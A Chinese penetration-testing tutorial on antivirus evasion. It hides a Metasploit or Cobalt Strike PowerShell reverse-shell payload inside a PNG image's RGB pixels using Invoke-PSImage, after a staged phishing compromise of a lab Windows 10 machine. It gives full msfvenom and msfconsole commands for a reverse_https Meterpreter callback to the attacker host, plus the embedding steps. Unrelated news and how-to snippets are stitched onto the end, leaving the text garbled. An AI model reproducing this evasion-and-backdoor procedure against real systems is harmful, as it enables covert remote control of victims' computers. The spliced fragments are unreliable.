专辑:渗透测试之地基篇
渗透测试-地基篇
该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式 *** ,望大家能共同加油学到东西。
请注意:
本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。
名言:
你对这行的兴趣,决定你在这行的成就!
如今杀毒软件不断的更新升级,在渗透测试中和HVV中如何绕过杀软成为渗透着们核心的技术,没有免杀就无法深入内网横向,往下看带来隐写RGB免杀的过程。
观望我写的好几篇免杀,都具有免杀效果,今天给大家带来将payload隐写到像素RGB中,从环境部署、CS和MSF的payload生成、到上线免杀控制、最后五次分析底层原理,最后总结给了点小建议,开始!
黑客(攻击者):
IP:192.168.253.8
系统:kali.2020.4
windows 10系统是黑客用于 *** 隐写RGB方式生成png图片的环境。
VPS服务器:
IP:192.168.253.8
此次环境将使用kali2020.4进行模拟VPS服务器http服务。
办公区域:
系统:windwos 10
IP:192.168.253.17
存在:360、360杀毒、火绒、deferencer,以及全球和全国杀软平台检测。
目前黑客通过kali系统进行攻击行为,通过钓鱼获得了对方的权限后,发现对方电脑上存在360、360杀毒、火绒、deferencer直接被杀软进行了查杀,无法进行反弹shell获得权限,如今将演示利用隐写术将shellcode隐写入PNG图片RGB像素中,隐藏后门代码,以及底层分析生成PNG,并控制对方的过程。
windows 10 环境上下载好PSImage源码,以及准备好一张jpg图片和powershell shellcode后门文件。
将 PSImage 源代码下载到本地:
https://github.com/dayuxiyou/Invoke-PSImage
Cobalt Strike生成powershell的后门payload.ps1。
msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_https; set lhost 192.168.253.8; set lport 5555; exploit -j; "
开启监听。
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.253.8 LPORT=5555 -f psh-reflection > msf-dayu.ps1
生成msf后门文件msf-dayu.ps1。
最后准备好一张jpg图片,全部放在文件夹内即可。
以下操作在Windows 10系统环境进行生成恶意文件png。
Set-ExecutionPolicy Unrestricted -Scope CurrentUser
进行更改执行策略,可帮助防止在执行ps1脚本时产生阻拦等报错,达不到效果。
Import-Module .\Invoke-PSimage.ps1
利用import_module来通过字符串导入Invoke-PSimage.ps1模块。
Invoke-PSImage -Script .\cs-dayu.ps1 -Image .\dayu.jpg -Out .\cs-dayu.png -Web
1. -script 表示你要写入图片中的powershell脚本 2. -image 表示待写入恶意代码的图片 3. -Out 表示最后写入成功的图片 4. -Web 输出用于使用Net.WebClient从Web读取图像的命令。您将需要托管图像并将URL插入命令中
通过隐写RGB,将shellcode隐写入了像素低高位中,生成了png图片。另外给出了一串powershell代码。
贵州省第二家上市银行即将诞生。12月16日,贵州银行发布公告称,该行将于12月16日-19日开始招股,拟发行22亿股H股,其中公开发售2.2亿股,国际发售19.8亿股,预期H股将于12月30日上午九时...
2月16日0—24时,31个省(自治区、直辖市)和新疆生产建设兵团报告新增确诊病例2048例,新增死亡病例105例(湖北100例,河南3例,广东2例),新增疑似病例1563例。 当日新增治愈出院病例...
本文导读目录: 1、一般学电脑技术要多久? 2、想成为一名的黑客 必须学习哪些课程? 3、黑客好学吗? 4、shell, 抓包,的含义是什么?非计算机专业想入门黑客要多长时间要学些什么...
我们都知道,系统是需要激活才能正常使用的,但是有些电脑在使用一段时候后才发现win7系统未激活,那么这个时候该怎么办呢? 那当然是激活系统咯,怎么激活呢? 使用小马激活工具激活呀,下面,小编就来跟...
岛国发生了历史上最严重的用户信息泄露。 这个悲伤的消息是日本警方在上周五宣布的。 有1800万人次的用户名+密码被一家名为 Nicchu Shinsei(日铸新生集团)的公司通过地下...
老炮这个称呼是怎么来的?为啥叫他们老炮?北京几代人的回忆 在北京,在过去,在几十年前,在街头、巷尾,有一群青年,他们穿梭于交叉复杂的胡同之间,三五成群,拉帮结派。他们生活的主要项目是赛自行车,茬琴,...